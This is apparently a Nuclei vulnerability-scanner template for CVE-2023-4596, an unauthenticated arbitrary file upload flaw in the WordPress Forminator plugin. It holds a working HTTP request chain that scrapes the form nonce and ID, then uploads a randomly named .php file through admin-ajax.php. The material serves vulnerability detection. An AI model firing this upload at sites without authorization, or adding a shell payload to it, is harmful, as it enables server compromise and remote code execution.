id: CVE-2023-4596

info:
  name: WordPress Plugin Forminator 1.24.6 - Arbitrary File Upload
  author: E1A
  severity: critical
  description: |
    The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
  reference:
    - https://www.exploit-db.com/exploits/51664
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd87da6-1f4c-4a15-8ebb-6e0f8ef72513?source=cve
    - https://plugins.trac.wordpress.org/changeset/2954409/forminator/trunk/library/fields/postdata.php
    - https://github.com/E1A/CVE-2023-4596
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4596
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-4596
    cwe-id: CWE-434
    epss-score: 0.08202
    epss-percentile: 0.93687
    cpe: cpe:2.3:a:incsub:forminator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: incsub
    product: forminator
    framework: wordpress
    publicwww-query: /wp-content/plugins/Forminator
  tags: cve,cve2023,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBLOYSueQAdgN2PRe

        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="textarea-1"

        {{randstr}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="phone-1"

        {{rand_int(10)}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="email-1"

        test@gmail.com
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="name-1"

        {{randstr}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
        Content-Type: application/x-php


        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="forminator_nonce"

        {{forminator_nonce}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="form_id"

        {{form_id}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="current_url"

        {{BaseURL}}
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe
        Content-Disposition: form-data; name="action"

        forminator_submit_form_custom-forms
        ------WebKitFormBoundaryBLOYSueQAdgN2PRe

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'Upload file'
          - 'forminator-field-upload'
        condition: and

      - type: word
        part: body_2
        words:
          - '{"success":true'
          - '"form_id":"{{form_id}}"'
          - '"behav'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: forminator_nonce
        part: body
        group: 1
        regex:
          - 'name="forminator_nonce" value="([a-z0-9]+)" \/>'
        internal: true

      - type: regex
        name: form_id
        part: body
        group: 1
        regex:
          - 'name="form_id" value="([0-9]+)">'
        internal: true
# digest: 490a0046304402202ae98481b0091a80cc6a336e4e9073ebfa5ff244c7b7afbfb4f9e93f692c22260220182bfdd2f8821a4d44eaa01efe217cf76cc8ac7f91a7094dc578361ce8f8fc13:922c64590222798bb761d5b6d8e72950